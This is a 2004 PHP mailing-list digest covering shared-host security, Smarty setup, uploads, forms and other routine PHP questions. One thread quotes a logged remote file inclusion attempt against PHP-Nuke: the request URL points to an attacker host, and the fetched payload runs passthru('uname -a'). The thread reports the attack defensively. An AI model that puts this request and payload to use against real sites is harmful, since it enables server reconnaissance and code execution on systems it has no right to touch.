php-general Digest 26 Sep 2004 11:43:40 -0000 Issue 3018

2004-09-26 Thread php-general-digest-help


Topics (messages 197846 through 197868):

Re: Problems installing smarty on a shared host
197846 by: Curt Zirzow
197848 by: Pablo Gosse

Re: ftp_put Problems
197847 by: Marek Kilimajer
197849 by: raditha dissanayake

Re: is that possible with Objects in php 4 or php5 ?
197850 by: raditha dissanayake

Conceptual ?: using 'multi-purpose' form for validation
197851 by: Whil Hentzen
197866 by: Marek Kilimajer

php security on shared hosts
197852 by: Pablo Gosse
197853 by: Tim Traver
197858 by: Chris Shiflett
197859 by: Chris Shiflett
197861 by: raditha dissanayake

Server's IP Adress
197854 by: Kevin Javia
197855 by: Pahlevanzadeh Mohsen

Re: New PHP tutorial - suggestions welcome
197856 by: John Taylor-Johnston
197857 by: Jack Gates

OT - HTML Terminal ?
197860 by: Dave Restall - System Administrator,,,
197863 by: Marek Kilimajer

What's going on?
197862 by: Phpu
197867 by: Marek Kilimajer

Getting Header info with PHP?
197864 by: Nick Wilson

Instant messenger
197865 by: Phpu

Hacker IP and Script
197868 by: Jason Paschal


--
---BeginMessage---
* Thus wrote Pablo Gosse:
> Hi folks.  I've recently moved my site to a shared host, and this is the
> first time I've had to set up my site in a really restrictive
> environment, and I'm running into problems getting smarty installed.
>
> Using the basic example set up from the Smarty docs, when I run the file
> I get the following error:
>
> Warning: main(Smarty.class.php): failed to open stream: No such file or
> directory in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
>
> Fatal error: main(): Failed opening required 'Smarty.class.php'
> (include_path='.:/php/includes:/usr/share/php:/home/pablogosse/smarty/')
> in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
>
> Now, as you can see by the value of my include path, I've got the path
> to smarty added, but it's still not finding the file even though
> /home/pablogosse/smarty/Smarty.class.php does indeed exist.

You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse

If you have permissions to, I would set up a directory like:

  /home/virtual/site357/fst/var/include/smarty/

And then set the include_path appropriately.


Curt
-- 
The above comments may offend you. flame at will.
---End Message---
---BeginMessage---
[snip]
You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse

If you have permissions to, I would set up a directory like:

  /home/virtual/site357/fst/var/include/smarty/

And then set the include_path appropriately.
[/snip]

Unfortunately I don't have write access to /var as it is owned by root.

I've just discovered another thing which makes me even more nervous.

I just wrote a script as a quick test and I was able to use
file_get_contents to read a file out of another user's webroot.  So,
anyone who is storing passwords or other valuable information under
their webroot risks having that information being easily accessible to
anyone else hosting here.

As I said earlier, most of my experience until now has been in
situations where the sites I've worked on have been hosted on dedicated
servers, and this has never been a problem.

Is this a common set up for shared hosting?  Is there any way around
this?

Cheers and TIA,
Pablo
---End Message---
---BeginMessage---
Julian wrote:
> well, i suspect i am at a dead end. here is the layout of things.
> we want to put up an internet kiosk at certain thoroughbred auctions to
> allow people to send ecards as well as contact associates. we have a web cam
> on the kiosk and a partner came up with the idea of letting them send photos
> of themselves as well. the problem is i cannot find a way to use the form
> type FILE without giving the user access to everything on the kiosk
> computer. try as i might i cannot get around that browse button. so i
> thought i would try the ftp functions which i am totally unfamiliar with. i
> do truly appreciate the time you and others took to look into this.

You can set up Apache and PHP on the kiosk machine. Document root will
be the folder where the webcam stores images, or just one directory up.
You can create a simple php script that will let them browse the
pictures (only the pictures :)), or not so simple that will allow them
to make some adjustments to the pictures using image functions. When
everything is ready, with a press of a button they can mail the ecards.
What 

[PHP] OT - HTML Terminal ?

2004-09-26 Thread Dave Restall - System Administrator,,,
Hi,

this is severely off topic so please feel free to ignore it :-)

I have an intranet application that currently is accessed using a
browser, no problems there, however I have been asked if I can get rid
of the browser so that the users are not encouraged to surf so readily.
I initially thought simple - start the browser with the correct home page
as a command line argument and turn off all the tool bars etc. so that it
looks like an xterm (dos window) and of course they can only then click
on the links we provide.  It's not meant to be foolproof and a dedicated
hacker could circumvent the system, however most users won't bother.

I don't particularly want to go the F11 (full screen) route and would
like something easy to install if possible, e.g. a single .exe, Lynx
seemed a good point to start but I think that would freak out just about
all the end users :-)

Does anybody have any POLITE suggestions or any experience of something
similar and can let me in on the secret ?

I have tried google, mozilla & m$ the nearest I have come so far is IEAK.

TTFN,


Dave
++
| Dave Restall,   IIRC Limited, PO Box 46, Skelton, Cleveland, TS12 2GT. |
| Tel. 0845 10 80 151Mob. +44 (0) 7973 831245   Int. +44 (0) 1287 653003 |
| email : [EMAIL PROTECTED]   [EMAIL PROTECTED] Web : http://www.iirc.net |
++
| I have learned To spell hors d'oeuvres Which still grates on Some  |
| people's n'oeuvres.|
| -- Warren Knox |
++

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] php security on shared hosts

2004-09-26 Thread raditha dissanayake
Pablo Gosse wrote:
> Hi folks. I recently set up hosting for my site and have noticed
> something which is making me nervous.

If you are really nervous you cannot use shared hosting. Simple as that.
Even if other users don't access your stuff, the root user can. While
it's against the system administrator's code of conduct to look into
other users' files, you cannot rule out the possibility of someone
taking a peek.

As Chris has pointed out, safe mode is no protection. On some servers
(not all) you can try changing your home directory permissions to remove
others' read and others' execute to get an additional measure of protection.

--
Raditha Dissanayake.

http://www.radinks.com/sftp/ | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Inteface. Just 128 KB | with progress bar.


[PHP] What's going on?

2004-09-26 Thread Phpu
For the last 2 days I haven't received emails. What's going on with this mailing list?

Re: [PHP] OT - HTML Terminal ?

2004-09-26 Thread Marek Kilimajer
Dave Restall - System Administrator,,, wrote:
> Hi,
>
> this is severely off topic so please feel free to ignore it :-)
>
> I have an intranet application that currently is accessed using a
> browser, no problems there, however I have been asked if I can get rid
> of the browser so that the users are not encouraged to surf so readily.
> I initially thought simple - start the browser with the correct home page
> as a command line argument and turn off all the tool bars etc. so that it
> looks like an xterm (dos window) and of course they can only then click
> on the links we provide.  It's not meant to be foolproof and a dedicated
> hacker could circumvent the system, however most users won't bother.
>
> I don't particularly want to go the F11 (full screen) route and would
> like something easy to install if possible, e.g. a single .exe, Lynx
> seemed a good point to start but I think that would freak out just about
> all the end users :-)
>
> Does anybody have any POLITE suggestions or any experience of something
> similar and can let me in on the secret ?
>
> I have tried google, mozilla & m$ the nearest I have come so far is IEAK.

You can rewrite the interface in XUL for mozilla:
http://www.xulplanet.com/


[PHP] Getting Header info with PHP?

2004-09-26 Thread Nick Wilson
Hi everyone, 

Can anyone tell me which functions/areas I need to look at to do the
following?

*   I need to check a proxy server. 
*   I want to have the proxy fetch a php page at my site
*   my php page should show me *every* header the proxy server sends

Is that possible?

much thanks, and have a nice sunday morning ;-)
-- 
Nick W




[PHP] Instant messenger

2004-09-26 Thread Phpu
Hi,
I wanna create an instant private messenger. This kind of IM I have seen on dating
sites.
I've googled for such IM but I found nothing.
Can someone please help me with this?

Thank you

Re: [PHP] Conceptual ?: using 'multi-purpose' form for validation

2004-09-26 Thread Marek Kilimajer
Whil Hentzen wrote:
> I can get a single form to call itself again if there's nothing fancy going
> on. This code will prompt the user for their mail if it doesn't already
> exist, and if the email does exist, provides some data out of database.
>
> <?php
> // Take the address from the POST body; empty string until the form is submitted.
> $email = (isset($_POST['email']) ? $_POST['email'] : '');
> if ( !validate_email($email) ): ?>
>   <!-- No email, so prompt the user for one. -->
>   <form action="<?= htmlspecialchars($_SERVER['PHP_SELF']) ?>" method="post">
>   Login: <input type="text" name="email" />
>   <input type="submit" value="GO" />
>   </form>
> <?php else: ?>
>   <!-- The form posts, so show the validated POST value, HTML-escaped. -->
>   <p>Data for email: <?= htmlspecialchars($email) ?></p>
>   <?php // do some database stuff and display the results ?>
> <?php endif; ?>
>
> I'd like to validate the email that was entered against a database - if the
> email address is found, continue on with the ELSE code. If not found, though,
> run the IF section again.
>
> Conceptually I'm missing how to do that. I've done it in two pages, where the
> form action calls a second PHP page, and the code in that second page looks
> for the address and displays one result or another depending on if it's
> found.
>
> How do I do this in one page, if it's appropriate and practical (i.e. good
> coding) to do so?
>
> Thanks,
> Whil


Re: [PHP] What's going on?

2004-09-26 Thread Marek Kilimajer
Phpu wrote:
> For the last 2 days I haven't received emails. What's going on with this mailing list?

It might have something to do with the fact your clock is 2 days behind. 
Have you been time travelling?



[PHP] Hacker IP and Script

2004-09-26 Thread Jason Paschal
This is of questionable relevance, but I'm sure it can serve to
heighten awareness of vulnerabilities for those PHP'ers with similar
scripts that involve loading files based upon query string info.

We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure
recently sent us an email of a thwarted hacking attempt:


Admin Secure detecting invalid file inclusion passed to index.php or
modules.php files. This could be possible cross-site scripting (XSS)
hack attempt to your site.  For security reason, this attempt has been
blocked by Admin Secure to protect your website. Admin Secure has been
collecting the following information:

- Date: 26 September 2004, 01:05
- IP Address: 193.150.170.160
- User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
- Request: 
/modules.php?name=http://193.150.170.160/4do4sjr?sa=http://193.150.170.160/4do4sjr?year=http://193.150.170.160/4do4sjr?month=http://193.150.170.160/4do4sjr?month_l=http://193.150.170.160/4do4sjr?
- Variable: $name = http://193.150.170.160/4do4sjr?

Whois Information.
---

The link he was trying to get our scripts to load,
http://193.150.170.160/4do4sjr? , displays this:

<?php echo "\nbl3"; echo "bl3" ; passthru("uname -a 2>&1"); ?>

Which would, from what I've read about the uname command, give him
info about our web server, and from there he would have an idea of
which vulnerabilities to exploit.



What would you guys do with the attack information (IP, WHOIS)?  Send
a detailed email to the addresses listed in the WHOIS records?  I'm
not sweating it, just curious.

Thank you,
~Jason




Re: [PHP] Hacker IP and Script

2004-09-26 Thread Adrian
I would remove bad scripts like *Nuke.
Their code just sucks and has really lots of bugs.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
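
As an added illustration of the request Jason reports (not code from PHP-Nuke, Admin Secure or any poster), the PHP below resolves a module name taken from the query string only to a file that exists under a modules directory, and separately flags query parameters whose value starts with a URL scheme. The function names, the module name `News` and the temporary directory are assumptions made for the example; PHP 7.1 or later is assumed.

```php
<?php
// Added example, not PHP-Nuke or Admin Secure code. The directory layout and
// the module name "News" are constructed for the demonstration.

// The pattern at risk is an include built from the query string, e.g.
//     include $_GET['name'] . '/index.php';
// where a URL in "name" can make PHP fetch and execute remote code.

/** Resolve a module name to a file under $modulesDir, or null if rejected. */
function resolve_module(string $name, string $modulesDir): ?string
{
    // 1. Syntax: a short identifier only (no scheme, slash, dot or NUL byte).
    if (preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $name) !== 1) {
        return null;
    }
    // 2. Existence: the module's entry file must really be on disk.
    $base = realpath($modulesDir);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name . DIRECTORY_SEPARATOR . 'index.php');
    if ($target === false) {
        return null;
    }
    // 3. Containment: with symlinks resolved, the file must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

/** Return the query parameters whose value starts with "scheme://". */
function url_valued_params(string $requestUri): array
{
    $pos = strpos($requestUri, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($requestUri, $pos + 1), $params);
    $hits = [];
    foreach ($params as $key => $value) {
        if (is_string($value) && preg_match('#\A\s*[a-z][a-z0-9+.\-]*://#i', $value) === 1) {
            $hits[$key] = $value;
        }
    }
    return $hits;
}

// Constructed module tree in a temporary directory.
$modulesDir = sys_get_temp_dir() . '/modules_demo_' . getmypid();
mkdir($modulesDir . '/News', 0700, true);
file_put_contents($modulesDir . '/News/index.php', "<?php echo 'news';\n");

// 'News', '../News' and 'Missing' are constructed; the URL is the $name value
// from the Admin Secure report quoted above.
foreach (['News', 'http://193.150.170.160/4do4sjr?', '../News', 'Missing'] as $name) {
    $path = resolve_module($name, $modulesDir);
    printf("%-34s => %s\n", $name, $path === null ? 'rejected' : 'include ' . $path);
}

// The request from the report, shortened to its first parameter.
$request = '/modules.php?name=http://193.150.170.160/4do4sjr?';
foreach (url_valued_params($request) as $key => $value) {
    echo "URL-valued parameter: $key = $value\n";
}

// Remove the constructed tree.
unlink($modulesDir . '/News/index.php');
rmdir($modulesDir . '/News');
rmdir($modulesDir);
```

The containment step only matters when a symlink sits inside the modules directory; the syntax check alone already rejects the URL value from the report.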



[PHP] Problem with uploaded file

2004-09-26 Thread Sagar C Nannapaneni
Hello folks,

I'm facing some sort of problem here. I'm uploading a file from
the clients system to the server. Everything working fine except 
that the file that is being uploaded is having a file permission of
600 ie only read and write to the owner only.

So i'm not able to change the permissions (either with some ftp
client or thru the file manager on the server) nor am i able to 
download the file even.

Is there any way that i can set permissions to the files that are
being uploaded.??

here is the code is used...

$uploaddir = './photos/';
  print "<pre>";

  // The extension is the text after the first dot of the client-supplied name.
  $arr_basename=explode(".",$_FILES['userfile0']['name']);
  $file_type=$arr_basename[1];
  $nameofphoto=$profileid."1.".$file_type;

  // @ hides any error from the move, so a failed upload goes unnoticed.
  @move_uploaded_file($_FILES['userfile0']['tmp_name'], $uploaddir . $nameofphoto);
  $uploaddir = './photos/';
  print "<pre>";

  $arr_basename=explode(".",$_FILES['userfile1']['name']);
  $file_type=$arr_basename[1];
  $nameofphoto1=$profileid."2.".$file_type;

  @move_uploaded_file($_FILES['userfile1']['tmp_name'], $uploaddir . $nameofphoto1);
  $uploaddir = './photos/';
  print "<pre>";

---
plzz help me out..

/sagar


[PHP] Re: Problem with uploaded file

2004-09-26 Thread Harlequin
Sagar

This is the code I use to change file permissions on a file that has been 
uploaded by a user to a predefined area with a predefined filename:

// Change File Permissions:
  chmod("{$uploadfile}", 0644);



-- 
-
 Michael Mason
 Arras People
 www.arraspeople.co.uk
-
Sagar C Nannapaneni [EMAIL PROTECTED] wrote in message 
news:[EMAIL PROTECTED]
> Hello folks,
>
> I'm facing some sort of problem here. I'm uploading a file from
> the clients system to the server. Everything working fine except
> that the file that is being uploaded is having a file permission of
> 600 ie only read and write to the owner only.
>
> So i'm not able to change the permissions (either with some ftp
> client or thru the file manager on the server) nor am i able to
> download the file even.
>
> Is there any way that i can set permissions to the files that are
> being uploaded.??
>
> here is the code is used...
>
> $uploaddir = './photos/';
>   print "<pre>";
>
>   $arr_basename=explode(".",$_FILES['userfile0']['name']);
>   $file_type=$arr_basename[1];
>   $nameofphoto=$profileid."1.".$file_type;
>
>   @move_uploaded_file($_FILES['userfile0']['tmp_name'], $uploaddir . $nameofphoto);
>   $uploaddir = './photos/';
>   print "<pre>";
>
>   $arr_basename=explode(".",$_FILES['userfile1']['name']);
>   $file_type=$arr_basename[1];
>   $nameofphoto1=$profileid."2.".$file_type;
>
>   @move_uploaded_file($_FILES['userfile1']['tmp_name'], $uploaddir . $nameofphoto1);
>   $uploaddir = './photos/';
>   print "<pre>";
>
> ---
> plzz help me out..
>
> /sagar




[PHP] GLOBAL reserved word

2004-09-26 Thread Pahlevanzadeh Mohsen
Dears, we can introduce an external variable to our
function with the GLOBAL reserved word, same as the following:
<?php
$n = 3;
function nn()
{
  global $n; // import the global $n into the function's scope
  echo $n;
} // end of func
?>

But I need to introduce an array. The name of my array is
month.
I typed global $month;. But it didn't work.
Please guide me until I can use an external array.
Yours, Mohsen.

=
-DIGITAL  SIGNATURE---
///Mohsen Pahlevanzadeh
 Network administrator   programmer 
  My home phone is: +98213810146  
My email address is  
  m_pahlevanzadeh at yahoo dot com   
My website is: http://webnegar.net







Re: [PHP] GLOBAL reserved word

2004-09-26 Thread Marek Kilimajer
Pahlevanzadeh Mohsen wrote:
> Dears, we can introduce an external variable to our
> function with the GLOBAL reserved word, same as the following:
> <?php
> $n = 3;
> function nn()
> {
>   global $n;
>   echo $n;
> } // end of func
> ?>
>
> But I need to introduce an array. The name of my array is
> month.
> I typed global $month;. But it didn't work.
> Please guide me until I can use an external array.
> Yours, Mohsen.

It works, you have an error somewhere else:
<?php
$month = array('January', 'February', 'March');
function nn()
{
  global $month; // import the global array into the function's scope
  echo $month[0];
}
nn();
?>


Re: [PHP] Re: simple templateing

2004-09-26 Thread Paul Bissex
On 25 Sep 2004 19:51:46 -, Matthew Weier O'Phinney
[EMAIL PROTECTED] wrote:
> I use Smarty. The thing about Smarty is it can be as simple or as
> complex as you want it. I personally feel you could do exactly as you
> describe with it -- just tell your designers the bare minimum of what
> you will allow in a template.

I'd second the recommendation of Smarty -- as Matthew implies, you can
set it up to only allow a restricted set of tags in templates, and you
can define what those tags are so that they are intuitive to your
template-editing users.

pb


-- 
paul bissex, e-scribe.com -- database-driven web development
413.585.8095
69.55.225.29
01061-0847
72°39'71W 42°19'42N




Re: [PHP] php security on shared hosts

2004-09-26 Thread Tim Traver
Chris,
I believe that is the reason that the PHP group came up with the 
open_basedir directive.

The open_basedir prevents you from looking into anything higher than a 
particular directory tree using PHP.

So, a combination of safe_mode and open_basedir should prevent your script 
from being able to walk the tree.

Is there some way to get around open_basedir ?
I didn't think there was, and if there is, then we better post that to the 
security guys at php, cause that's not good.

Yes, there are many scripts that assume no safe_mode, and therefore do not
work. It usually means they are trying to do something a little more
powerful with the filesystem, or system commands, and shared hosts don't
want random system commands being run on the machines...;)

Am I saying it's perfect ? No. I think it should be pretty safe though if
implemented correctly.

Tim.
At 09:47 PM 9/25/2004, Chris Shiflett wrote:
> --- Tim Traver [EMAIL PROTECTED] wrote:
> > I can guarantee that is not the way it is supposed to be. We
> > make sure that can't happen by running in Safe mode, using the
> > open_basedir directive, and making sure the directory tree has
> > the correct permissions so the situation you described cannot
> > happen.
>
> The safe_mode and open_basedir directives are certainly no protection. I'm
> curious what sort of permissions you are using that prevents this
> scenario, since it seems impossible to me. If the legitimate developer can
> include code using include or require, it means the Web server must be
> able to read those files. The exception would be if you're running each
> user in a chroot jail or something, mimicking a dedicated environment.
>
> > So, I'd say that your shared host is doing a poor job of
> > implementing PHP.
>
> I used to think the same, but I've changed my mind, because:
>
> 1. safe_mode is no protection.
> 2. Many prepackaged PHP applications don't work with safe_mode enabled.
>
> Hope that helps.
>
> Chris
>
> =
> Chris Shiflett - http://shiflett.org/
> PHP Security - O'Reilly
>  Coming December 2004
> HTTP Developer's Handbook - Sams
>  http://httphandbook.org/
> PHP Community Site
>  http://phpcommunity.org/

SimpleNet's Back !
http://www.simplenet.com


Re: [PHP] php security on shared hosts

2004-09-26 Thread Tim Traver
Oh, and I forgot, you can also specify specific include directories to be 
allowed for a particular user...

Tim.
At 09:47 PM 9/25/2004, Chris Shiflett wrote:
> --- Tim Traver [EMAIL PROTECTED] wrote:
> > I can guarantee that is not the way it is supposed to be. We
> > make sure that can't happen by running in Safe mode, using the
> > open_basedir directive, and making sure the directory tree has
> > the correct permissions so the situation you described cannot
> > happen.
>
> The safe_mode and open_basedir directives are certainly no protection. I'm
> curious what sort of permissions you are using that prevents this
> scenario, since it seems impossible to me. If the legitimate developer can
> include code using include or require, it means the Web server must be
> able to read those files. The exception would be if you're running each
> user in a chroot jail or something, mimicking a dedicated environment.
>
> > So, I'd say that your shared host is doing a poor job of
> > implementing PHP.
>
> I used to think the same, but I've changed my mind, because:
>
> 1. safe_mode is no protection.
> 2. Many prepackaged PHP applications don't work with safe_mode enabled.
>
> Hope that helps.
>
> Chris
>
> =
> Chris Shiflett - http://shiflett.org/
> PHP Security - O'Reilly
>  Coming December 2004
> HTTP Developer's Handbook - Sams
>  http://httphandbook.org/
> PHP Community Site
>  http://phpcommunity.org/

SimpleNet's Back !
http://www.simplenet.com


Re: [PHP] php security on shared hosts

2004-09-26 Thread Marek Kilimajer
Tim Traver wrote:
> Chris,
> I believe that is the reason that the PHP group came up with the
> open_basedir directive.
>
> The open_basedir prevents you from looking into anything higher than a
> particular directory tree using PHP.
>
> So, a combination of safe_mode and open_basedir should prevent your
> script from being able to walk the tree.
>
> Is there some way to get around open_basedir ?

Only if you are able to execute commands outside of php, what Pablo is.

> I didn't think there was, and if there is, then we better post that to
> the security guys at php, cause that's not good.
>
> Yes, there are many scripts that assume no safe_mode, and therefore do
> not work. It usually means they are trying to do something a little more
> powerful with the filesystem, or system commands, and shared hosts don't
> want random system commands being run on the machines...;)
>
> Am I saying it's perfect ? No. I think it should be pretty safe though if
> implemented correctly.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
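
Curt's remark about `drwxr-x---` on the home directory and Raditha's suggestion to remove others' read and execute both turn on what the "other" permission class can reach. The PHP below is an added example (not code from any poster) that lists the files in a tree reachable by that class; it assumes POSIX permissions and PHP 7.1 or later, and the function names and the directory layout are constructed for the demonstration.

```php
<?php
// Added example, not code from the thread. Assumes POSIX permissions; the
// tree below is constructed in a temporary directory.

/**
 * List the files under $dir that a user in the "other" permission class
 * can reach: o+x on every directory on the way down, o+r on the file.
 */
function exposed_files(string $dir): array
{
    $found = [];
    // Without the search bit (o+x) nothing below this directory is reachable,
    // whatever the modes of the files inside it.
    if ((fileperms($dir) & 0001) === 0) {
        return $found;
    }
    foreach (scandir($dir) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = $dir . '/' . $entry;
        if (is_link($path)) {
            continue; // do not follow symlinks out of the tree
        }
        if (is_dir($path)) {
            $found = array_merge($found, exposed_files($path));
        } elseif ((fileperms($path) & 0004) !== 0) {
            $found[] = $path;
        }
    }
    return $found;
}

/** Create a file with an exact mode, independent of the process umask. */
function make_file(string $path, int $mode): void
{
    file_put_contents($path, "constructed sample\n");
    chmod($path, $mode);
}

// Constructed layout: a web root plus a private directory beside it.
$root = sys_get_temp_dir() . '/perm_demo_' . getmypid();
mkdir($root);
chmod($root, 0755);
mkdir("$root/html");
chmod("$root/html", 0755);
mkdir("$root/private");
chmod("$root/private", 0750);                 // like drwxr-x--- in the thread
make_file("$root/html/index.php", 0644);      // o+r under traversable directories
make_file("$root/html/db.inc.php", 0640);     // no o+r on the file itself
make_file("$root/private/config.php", 0644);  // o+r, but the parent blocks traversal

clearstatcache(); // make sure fileperms() sees the modes set above
foreach (exposed_files($root) as $file) {
    printf("%04o  %s\n", fileperms($file) & 0777, substr($file, strlen($root) + 1));
}

// Remove the constructed tree.
foreach (['html/index.php', 'html/db.inc.php', 'private/config.php'] as $f) {
    unlink("$root/$f");
}
rmdir("$root/html");
rmdir("$root/private");
rmdir($root);
```

Whether the web server account falls in the group or the other class differs between hosts, so a file missing from this list can still be readable by scripts that run as the web server.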


[PHP] Best way to save preferences?

2004-09-26 Thread Victor Spång Arthursson
Which is the best way to save preferences (for a site) to make them
easily accessible for changes?

What I want is a way to save arrays and read them in again without 
having to use a database

Thankful for suggests,
sincerely
Victor


[PHP] Post vars without using html form

2004-09-26 Thread Harry.de
Does anybody know how to post vars without using html?
I'd like to send data to an external website and receive the http answer.
The external website awaits post vars from a form.

Thanks, Harry




[PHP] 9 line function logic problem

2004-09-26 Thread Mag
Hi,
I am going crazy with this function please have a look
at it and tell me what i am doing wrong.

This is my setup:
I have a file called one.html.cache in the directory
/cache/

in one.html.cache I have a time()+ 3600 number (eg:
1096224755)

I need to know if the number in that file is still
bigger  than the present time() or not

the problem is, it is always returning zero...

here's the function:

echo b.is_cache(one.html);


function is_cache($get_file)
{
$th_file = $include_path.$get_file . '.cache';
$fp = fopen($th_file, 'a+');
fseek($fp, 0);
$rd = fread($fp, filesize($th_file));
fclose($fp);

if (time() - $rd  5)
return 0;
else
return 1;
}

What am i doing wrong? or is there a better way of
doing this?

Thanks,
Mag


=
--
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)






Re: [PHP] Best way to save preferences?

2004-09-26 Thread Pahlevanzadeh Mohsen
You should use XML files, but XML files will be locked
when you want multiple users to read them.
Also, arrays have overhead for your server. The best
way is using databases.
Yours, Mohsen.
--- Victor Spång Arthursson [EMAIL PROTECTED]
wrote:

> Which is the best way to save preferences (for a
> site) to make them
> easily accessible for changes?
>
> What I want is a way to save arrays and read them in
> again without
> having to use a database…
>
> Thankful for suggests,
>
> sincerely
>
> Victor



Re: [PHP] Post vars without using html form

2004-09-26 Thread Pahlevanzadeh Mohsen
You must use socket programming.
PHP has supported socket programming.
You can choose port 80 and then use its functions.
Yours, Mohsen
--- Harry.de [EMAIL PROTECTED] wrote:

> Does anybody know how to post vars without using
> html?
> I'd like to send data to an external website and
> receive the http answer.
> The external website awaits post vars from a form.
>
> Thanks, Harry
 



[PHP] Version Controlling

2004-09-26 Thread Stephen Craton
This is slightly off topic, but I feel it's a little something that's worthy
of discussion here. I've been interested in running CVS for a while now, but
being on a Windows machine is holding me back somewhat, and I'm not entirely
sure CVS is even something I need.

Basically, I have some computers, mostly my laptop and desktop, and I want
to be able to sync them based on version controlling, much like CVS, but I'm
not sure if it's too advanced or not.

My basic question is: What do you do, if anything, for syncing/version
control between your computers for your web development projects?


WiredPHP
Stephen Craton
Web Developer
IM: [EMAIL PROTECTED]
http://www.wiredphp.us





Re: [PHP] Best way to save preferences?

2004-09-26 Thread Marek Kilimajer
Pahlevanzadeh Mohsen wrote:
> You should use XML files, but XML files will be locked
> when you want multiple users to read them.

It's not necessary to lock files for reading.

> Also, arrays have overhead for your server. The best
> way is using databases.
> Yours, Mohsen.
> --- Victor Spång Arthursson [EMAIL PROTECTED]
> wrote:
>
> > Which is the best way to save preferences (for a
> > site) to make them
> > easily accessible for changes?

ini files, pure php (fastest), some custom format (slowest)

> > What I want is a way to save arrays and read them in
> > again without
> > having to use a database
> >
> > Thankful for suggests,
> > sincerely
> > Victor


Re: [PHP] Best way to save preferences?

2004-09-26 Thread Jason Wong
On Monday 27 September 2004 01:00, Victor Spång Arthursson wrote:
> Which is the best way to save preferences (for a site) to make them
> easily accessible for changes?
>
> What I want is a way to save arrays and read them in again without
> having to use a database

serialize().

Or if you want to use databases but do not want to run a full blown database 
server then check out sqlite.

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Never sleep with anyone crazier than yourself
-- Murphy's Laws on Sex n14
*/




Re: [PHP] Best way to save preferences?

2004-09-26 Thread Pahlevanzadeh Mohsen
Dear, I mean that you can't read an XML file in multiuser
mode.
--- Marek Kilimajer [EMAIL PROTECTED] wrote:

> Pahlevanzadeh Mohsen wrote:
> > You should use XML files, but XML files will be
> > locked
> > when you want multiple users to read them.
>
> It's not necessary to lock files for reading.
>
> > Also, arrays have overhead for your
> > server. The best
> > way is using databases.
> > Yours, Mohsen.
> > --- Victor Spång Arthursson [EMAIL PROTECTED]
> > wrote:
> >
> > > Which is the best way to save preferences (for a
> > > site) to make them
> > > easily accessible for changes?
>
> ini files, pure php (fastest), some custom format
> (slowest)
>
> > > What I want is a way to save arrays and read them
> > > in
> > > again without
> > > having to use a database…
> > >
> > > Thankful for suggests,
> > >
> > > sincerely
> > >
> > > Victor
 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit:
 http://www.php.net/unsub.php
 
 
  
  
  
  =
  -DIGITAL  SIGNATURE---
  ///Mohsen Pahlevanzadeh
   Network administrator   programmer 
My home phone is: +98213810146  
  My email address is   
   
m_pahlevanzadeh at yahoo dot com
   
  My website is: http://webnegar.net
 


  
  
  
  __
  Do you Yahoo!?
  New and Improved Yahoo! Mail - Send 10MB messages!
  http://promotions.yahoo.com/new_mail 
  
 
 


=
-DIGITAL  SIGNATURE---
///Mohsen Pahlevanzadeh
 Network administrator   programmer 
  My home phone is: +98213810146  
My email address is  
  m_pahlevanzadeh at yahoo dot com   
My website is: http://webnegar.net







Re: [PHP] Version Controlling

2004-09-26 Thread Marek Kilimajer
Stephen Craton wrote:
This is slightly off topic, but I feel it's a little something that's worthy
of discussion here. I've been interested in running CVS for a while now, but
being on a Windows machine is holding me back somewhat, and I'm not entirely
sure CVS is even something I need.
Basically, I have some computers, mostly my laptop and desktop, and I want
to be able to sync them based on version controlling, much like CVS, but I'm
not sure if it's too advanced or not.
My basic question is: What do you do, if anything, for syncing/version
control between your computers for your web development projects?

rsync, some files are excluded


[PHP] Re: Version Controlling

2004-09-26 Thread Greg Beaver
Stephen Craton wrote:
This is slightly off topic, but I feel it's a little something that's worthy
of discussion here. I've been interested in running CVS for a while now, but
being on a Windows machine is holding me back somewhat, and I'm not entirely
sure CVS is even something I need.
Basically, I have some computers, mostly my laptop and desktop, and I want
to be able to sync them based on version controlling, much like CVS, but I'm
not sure if it's too advanced or not.
My basic question is: What do you do, if anything, for syncing/version
control between your computers for your web development projects?

There are many solutions, but better than using a constant version 
control system like CVS or subversion is to use cvs/subversion for 
development only.  When things seem to be working, make a release tag, 
and bundle up that code as a package.  You can either zip it up and 
unzip on the production server, or use the pear installer's built-in 
capabilities to customize things.

This strategy is much better, because if it turns out a slight 
difference between your computers breaks the code, you can quickly and 
easily revert to an earlier release (especially if you use the pear 
installer).  If you use the PEAR installer, you can also use the 
dependencies feature to split your code up into smaller chunks, making 
maintenance of large projects even simpler.

use TortoiseCVS, you will never have doubts about how easy it is to use 
cvs on windows again.

Greg


Re: [PHP] Post vars without using html form

2004-09-26 Thread Nick Wilson

* and then Pahlevanzadeh Mohsen declared
 You must use Socket Programming.
 PHP have been supported socket programming.
 You can choose port 80 then use its functions.

There is an easier way. Use the cURL functions:
very simple and doing a search for curl php tutorial or similar will
help you out :-)

-- 
Nick W




Re: [PHP] php security on shared hosts

2004-09-26 Thread Chris Shiflett
--- Tim Traver [EMAIL PROTECTED] wrote:
 I believe that is the reason that the PHP group came up with the
 open_basedir directive.
 
